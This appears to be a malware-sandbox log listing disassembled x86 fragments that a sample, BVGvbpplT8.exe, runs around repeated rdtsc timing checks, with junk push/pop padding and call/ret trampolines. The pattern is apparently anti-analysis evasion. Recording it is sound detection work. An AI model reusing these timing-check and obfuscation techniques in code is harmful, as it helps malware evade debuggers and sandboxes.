Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAAEA second address: 10EAAEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAAEE second address: 10EAB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAB00 second address: 10EAB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAF8FC5090h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAB1A second address: 10EAB46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007FAAF9128031h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAB46 second address: 10EAB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAB4A second address: 10EAB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10EAB4E second address: 10EAB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FAAF8FC5088h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dx, ax 0x00000025 mov edi, dword ptr [ebp+122D38DEh] 0x0000002b lea ebx, dword ptr [ebp+12456659h] 0x00000031 mov edi, esi 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 jmp 00007FAAF8FC5090h 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1108AB8 second address: 1108AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1108F45 second address: 1108F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11090C2 second address: 11090C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11090C6 second address: 11090CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1109507 second address: 110950D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110950D second address: 1109517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1109517 second address: 110951B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110951B second address: 1109521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11097E1 second address: 11097F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF9128034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11097F9 second address: 1109816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5099h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1109C54 second address: 1109C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1109C5A second address: 1109C64 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAF8FC5086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1109C64 second address: 1109C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110D55A second address: 110D560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110C429 second address: 110C42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110EE1B second address: 110EE20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110EE20 second address: 110EE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 110EE28 second address: 110EE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DD51D second address: 10DD533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAF912802Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1116D81 second address: 1116D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1116D88 second address: 1116D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10DA0AE second address: 10DA0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1116447 second address: 111645D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAAF9128026h 0x0000000a popad 0x0000000b jc 00007FAAF9128030h 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11169A6 second address: 11169BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11184AF second address: 11184BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAF9128026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10E26BC second address: 10E26C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10E26C0 second address: 10E26DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAF9128026h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FAAF9128030h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10E26DC second address: 10E26F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FAAF8FC5086h 0x00000009 jng 00007FAAF8FC5086h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1118CAC second address: 1118CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4428A506h 0x0000000f jmp 00007FAAF912802Ch 0x00000014 push AF7ECD7Fh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1118CD1 second address: 1118CF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC5093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FAAF8FC5086h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11198F5 second address: 11198F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11198F9 second address: 1119902 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1119A60 second address: 1119A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1119EBE second address: 1119EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1119EC2 second address: 1119ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007FAAF9128032h 0x0000000e js 00007FAAF912802Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1119F7A second address: 1119F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1119F7E second address: 1119F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1119F88 second address: 1119F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111A40E second address: 111A412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111ADF6 second address: 111AE24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FAAF8FC5086h 0x00000009 jmp 00007FAAF8FC5091h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAF8FC508Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111C026 second address: 111C090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c or dword ptr [ebp+122D34D4h], esi 0x00000012 mov dword ptr [ebp+122D346Fh], ebx 0x00000018 popad 0x00000019 mov di, 75EDh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FAAF9128028h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 movsx edi, dx 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007FAAF9128028h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000017h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 clc 0x00000059 push eax 0x0000005a push ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d jno 00007FAAF9128026h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111B72D second address: 111B748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAF8FC5096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111B748 second address: 111B756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111B756 second address: 111B75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111C9CA second address: 111C9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111B75C second address: 111B760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111C9D1 second address: 111C9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111C9D7 second address: 111C9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111C9DB second address: 111C9F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAF9128032h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10D6B6A second address: 10D6B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10D6B6E second address: 10D6B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10D6B7C second address: 10D6B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 10D6B82 second address: 10D6B9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128031h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 111EACF second address: 111EAD4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1120A99 second address: 1120A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1120A9E second address: 1120B25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c jno 00007FAAF8FC508Ch 0x00000012 mov edi, dword ptr [ebp+122D365Eh] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FAAF8FC5088h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007FAAF8FC5088h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 add dword ptr [ebp+122D2BEAh], ebx 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FAAF8FC5099h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1125E36 second address: 1125E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11271BE second address: 11271DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAF8FC508Fh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11271DA second address: 11271E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11271E0 second address: 1127277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAF8FC508Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FAAF8FC5097h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FAAF8FC5088h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D1F63h], eax 0x00000035 mov ebx, esi 0x00000037 push 00000000h 0x00000039 and bx, 4950h 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 jmp 00007FAAF8FC508Fh 0x00000045 pop ebx 0x00000046 push eax 0x00000047 pushad 0x00000048 jo 00007FAAF8FC508Ch 0x0000004e jnc 00007FAAF8FC5086h 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FAAF8FC5098h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1129245 second address: 1129249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1129249 second address: 11292D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007FAAF8FC5086h 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FAAF8FC5088h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jl 00007FAAF8FC5086h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FAAF8FC5088h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e or di, 4AE3h 0x00000053 push 00000000h 0x00000055 mov edi, dword ptr [ebp+122D38BEh] 0x0000005b xchg eax, esi 0x0000005c jmp 00007FAAF8FC508Bh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FAAF8FC508Ch 0x00000069 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11292D3 second address: 11292D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112A36E second address: 112A372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112B36D second address: 112B38E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAF912802Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112C324 second address: 112C371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push esi 0x00000009 mov dword ptr [ebp+122D23FCh], edi 0x0000000f pop edi 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D34D4h], eax 0x00000018 push 00000000h 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c jp 00007FAAF8FC509Dh 0x00000022 jno 00007FAAF8FC5088h 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jne 00007FAAF8FC5088h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112EA95 second address: 112EA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113214D second address: 113216B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAF8FC508Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1133265 second address: 113326B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113326B second address: 113326F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113233B second address: 113233F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 112FD00 second address: 112FD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 113233F second address: 1132367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FAAF9128026h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1134276 second address: 11342F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAAF8FC5097h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FAAF8FC5088h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c xor bx, 0425h 0x00000031 push 00000000h 0x00000033 jmp 00007FAAF8FC5090h 0x00000038 push 00000000h 0x0000003a jc 00007FAAF8FC5088h 0x00000040 mov bl, dl 0x00000042 xchg eax, esi 0x00000043 jg 00007FAAF8FC5094h 0x00000049 pushad 0x0000004a jng 00007FAAF8FC5086h 0x00000050 jc 00007FAAF8FC5086h 0x00000056 popad 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1133403 second address: 1133407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
